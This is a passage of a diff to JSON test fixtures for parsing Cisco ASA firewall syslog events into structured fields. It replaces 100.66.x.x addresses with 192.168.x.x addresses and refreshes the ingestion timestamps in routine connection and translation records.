+13688,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -13724,7 +13724,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -13733,8 +13733,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111940756Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", + "ingested": "2021-12-09T13:31:36.364128900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13750,7 +13750,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11827", "source_interface": "outside", "mapped_destination_port": 1293 @@ -13767,8 +13767,8 @@ }, "destination": { "port": 8298, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1294, @@ -13808,7 +13808,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13816,8 +13816,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111942464Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298", + "ingested": "2021-12-09T13:31:36.364133400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298", "code": "305011", "kind": "event", "action": "firewall-rule", 
@@ -13850,8 +13850,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -13886,7 +13886,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -13895,8 +13895,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111944143Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", + "ingested": "2021-12-09T13:31:36.364139400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13912,7 +13912,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11828", "source_interface": "outside", "mapped_destination_port": 1294 @@ -13934,8 +13934,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -13970,7 +13970,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -13981,8 +13981,8 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:02.111945860Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:100.66.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs",
+ "ingested": "2021-12-09T13:31:36.364145300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -14014,8 +14014,8 @@
 },
 "destination": {
 "port": 8299,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1295,
@@ -14055,7 +14055,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -14063,8 +14063,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111947526Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299",
+ "ingested": "2021-12-09T13:31:36.364153400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -14097,8 +14097,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -14133,7 +14133,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -14142,8 +14142,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111949218Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)",
+ "ingested": "2021-12-09T13:31:36.364158300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -14159,7 +14159,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
 "connection_id": "11829",
 "source_interface": "outside",
 "mapped_destination_port": 1295
@@ -14176,8 +14176,8 @@
 },
 "destination": {
 "port": 8300,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1296,
@@ -14217,7 +14217,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -14225,8 +14225,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111950929Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300",
+ "ingested": "2021-12-09T13:31:36.364162600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -14259,8 +14259,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -14295,7 +14295,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -14304,8 +14304,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111952653Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)",
+ "ingested": "2021-12-09T13:31:36.364167300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -14321,7 +14321,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
 "connection_id": "11830",
 "source_interface": "outside",
 "mapped_destination_port": 1296
@@ -14343,8 +14343,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -14379,7 +14379,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -14390,8 +14390,8 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:02.111954329Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:100.66.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs",
+ "ingested": "2021-12-09T13:31:36.364172200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -14428,8 +14428,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -14464,7 +14464,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -14475,8 +14475,8 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:02.111956050Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:100.66.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs",
+ "ingested": "2021-12-09T13:31:36.364176800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -14513,8 +14513,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -14549,7 +14549,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -14560,8 +14560,8 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:02.111957829Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:100.66.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs",
+ "ingested": "2021-12-09T13:31:36.364181100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -14593,8 +14593,8 @@
 },
 "destination": {
 "port": 8301,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1297,
@@ -14634,7 +14634,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -14642,8 +14642,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111959527Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301",
+ "ingested": "2021-12-09T13:31:36.364185300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -14676,8 +14676,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -14712,7 +14712,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -14721,8 +14721,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111961201Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)",
+ "ingested": "2021-12-09T13:31:36.364189900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -14738,7 +14738,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
 "connection_id": "11831",
 "source_interface": "outside",
 "mapped_destination_port": 1297
@@ -14755,8 +14755,8 @@
 },
 "destination": {
 "port": 8302,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1298,
@@ -14796,7 +14796,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -14804,8 +14804,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111962914Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302",
+ "ingested": "2021-12-09T13:31:36.364193600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -14838,8 +14838,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -14874,7 +14874,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -14883,8 +14883,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111964597Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)",
+ "ingested": "2021-12-09T13:31:36.364197700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -14900,7 +14900,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
 "connection_id": "11832",
 "source_interface": "outside",
 "mapped_destination_port": 1298
@@ -14922,8 +14922,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.179.9",
- "ip": "100.66.179.9"
+ "address": "192.168.179.9",
+ "ip": "192.168.179.9"
 },
 "tags": [
 "preserve_original_event"
@@ -14958,7 +14958,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.179.9",
+ "192.168.179.9",
 "172.31.98.44"
 ]
 },
@@ -14967,8 +14967,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111966432Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:100.66.179.9/53 (100.66.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:31:36.364201600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -14984,7 +14984,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.179.9",
+ "mapped_source_ip": "192.168.179.9",
 "connection_id": "11833",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -15006,8 +15006,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.179.9",
- "ip": "100.66.179.9"
+ "address": "192.168.179.9",
+ "ip": "192.168.179.9"
 },
 "tags": [
 "preserve_original_event"
@@ -15042,7 +15042,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.179.9",
+ "192.168.179.9",
 "172.31.98.44"
 ]
 },
@@ -15052,8 +15052,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:02.111968117Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:100.66.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150",
+ "ingested": "2021-12-09T13:31:36.364206200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -15090,8 +15090,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -15126,7 +15126,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -15137,8 +15137,8 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:02.111969856Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:100.66.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs",
+ "ingested": "2021-12-09T13:31:36.364210200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -15170,8 +15170,8 @@
 },
 "destination": {
 "port": 8303,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1299,
@@ -15211,7 +15211,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -15219,8 +15219,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111971542Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303",
+ "ingested": "2021-12-09T13:31:36.364215100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -15253,8 +15253,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.247.99",
- "ip": "100.66.247.99"
+ "address": "192.168.247.99",
+ "ip": "192.168.247.99"
 },
 "tags": [
 "preserve_original_event"
@@ -15289,7 +15289,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.247.99",
+ "192.168.247.99",
 "172.31.98.44"
 ]
 },
@@ -15298,8 +15298,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111973237Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:100.66.247.99/80 (100.66.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)",
+ "ingested": "2021-12-09T13:31:36.364219200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -15315,7 +15315,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.247.99",
+ "mapped_source_ip": "192.168.247.99",
 "connection_id": "11834",
 "source_interface": "outside",
 "mapped_destination_port": 1299
@@ -15332,8 +15332,8 @@
 },
 "destination": {
 "port": 8304,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1300,
@@ -15373,7 +15373,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -15381,8 +15381,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111974896Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304",
+ "ingested": "2021-12-09T13:31:36.364222800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -15415,8 +15415,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -15451,7 +15451,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -15460,8 +15460,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111976804Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)",
+ "ingested": "2021-12-09T13:31:36.364226600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -15477,7 +15477,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
 "connection_id": "11835",
 "source_interface": "outside",
 "mapped_destination_port": 1300
@@ -15499,8 +15499,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -15535,7 +15535,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -15546,8 +15546,8 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:02.111978478Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:100.66.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs",
+ "ingested": "2021-12-09T13:31:36.364230800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -15584,8 +15584,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -15620,7 +15620,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -15631,8 +15631,8 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:02.111980180Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:100.66.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs",
+ "ingested": "2021-12-09T13:31:36.364257Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -15664,8 +15664,8 @@
 },
 "destination": {
 "port": 8305,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1301,
@@ -15705,7 +15705,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -15713,8 +15713,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111981860Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305",
+ "ingested": "2021-12-09T13:31:36.364262300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -15747,8 +15747,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -15783,7 +15783,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -15792,8 +15792,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111983582Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)",
+ "ingested": "2021-12-09T13:31:36.364267800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -15809,7 +15809,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
 "connection_id": "11836",
 "source_interface": "outside",
 "mapped_destination_port": 1301
@@ -15826,8 +15826,8 @@
